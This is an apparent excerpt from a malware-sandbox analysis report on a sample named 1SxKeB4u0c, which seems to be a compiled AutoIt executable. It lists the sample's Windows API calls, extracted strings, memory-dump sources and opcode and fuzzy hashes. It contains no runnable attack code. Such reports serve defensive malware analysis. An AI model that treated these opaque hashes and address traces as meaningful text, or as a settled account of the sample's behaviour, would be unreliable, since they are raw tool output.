                                                                              • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                              • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                              • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                              • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                              • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                              • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                              • GetCursorInfo.USER32(?), ref: 004750C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                              • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                              • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                              • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048A259
                                                                              • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                              • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                              • GetDesktopWindow.USER32 ref: 0048A40D
                                                                              • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 1297703922-3619404913
                                                                              • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                              • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                              • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                              • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
APIs
• CharUpperBuffW.USER32(?,?), ref: 00484424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
• Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
• Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
• Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• CharLowerBuffW.USER32(?,?), ref: 0046A3CB
• GetDriveTypeW.KERNEL32 ref: 0046A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
• Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
• Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
• Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
• GetFocus.USER32 ref: 0048C20C
• GetDlgCtrlID.USER32(00000000), ref: 0048C217
• _memset.LIBCMT ref: 0048C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
• GetMenuItemCount.USER32(?), ref: 0048C38D
• GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: ad5beb81f0ada449b327263f74f2cb26782bdfb8b89f9167df52625f6eec0ab5
• Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
• Opcode Fuzzy Hash: ad5beb81f0ada449b327263f74f2cb26782bdfb8b89f9167df52625f6eec0ab5
• Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
APIs
• GetDC.USER32(00000000), ref: 0047738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
• CreateCompatibleDC.GDI32(?), ref: 004773A7
• SelectObject.GDI32(00000000,?), ref: 004773B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
• SelectObject.GDI32(00000006,?), ref: 00477470
• DeleteObject.GDI32(?), ref: 00477479
• DeleteDC.GDI32(00000006), ref: 00477480
• ReleaseDC.USER32(00000000,?), ref: 0047748B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 2b762dd708e2377d79d2aa21dcf5ff924cc219c5593e0a4811c06dcfc48b0eee
• Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
• Opcode Fuzzy Hash: 2b762dd708e2377d79d2aa21dcf5ff924cc219c5593e0a4811c06dcfc48b0eee
• Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
APIs
  • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
  • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
  • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: c82d8282c772c613b2266dfa37dcd09a3a43a727d7e8e88506e67a441d56367e
• Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
• Opcode Fuzzy Hash: c82d8282c772c613b2266dfa37dcd09a3a43a727d7e8e88506e67a441d56367e
• Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
APIs
• _memset.LIBCMT ref: 00462D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
• GetMenuItemCount.USER32(004C5890), ref: 00462E66
• DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
• DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
• DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
• DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
• GetMenuItemCount.USER32(004C5890), ref: 00462F16
• SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
• GetCursorPos.USER32(?), ref: 00462F56
• SetForegroundWindow.USER32(00000000), ref: 00462F5F
• TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
• Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
• Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
• Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 02F52543
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53090
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530A2
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530B4
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530C6
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530D8
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530EA
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530FC
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F5310E
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53120
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53132
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53144
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53156
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53168
                                                                              • _free.LIBCMT ref: 02F52538
                                                                                • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
                                                                                • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
                                                                              • _free.LIBCMT ref: 02F5255A
                                                                              • _free.LIBCMT ref: 02F5256F
                                                                              • _free.LIBCMT ref: 02F5257A
                                                                              • _free.LIBCMT ref: 02F5259C
                                                                              • _free.LIBCMT ref: 02F525AF
                                                                              • _free.LIBCMT ref: 02F525BD
                                                                              • _free.LIBCMT ref: 02F525C8
                                                                              • _free.LIBCMT ref: 02F52600
                                                                              • _free.LIBCMT ref: 02F52607
                                                                              • _free.LIBCMT ref: 02F52624
                                                                              • _free.LIBCMT ref: 02F5263C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                              • CoInitialize.OLE32(00000000), ref: 00478904
                                                                              • CoUninitialize.OLE32 ref: 0047890E
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                              • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                              • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID: ,,I
                                                                              • API String ID: 2395222682-4163367948
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              APIs
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_memmove
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 2279737902-1007645807
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
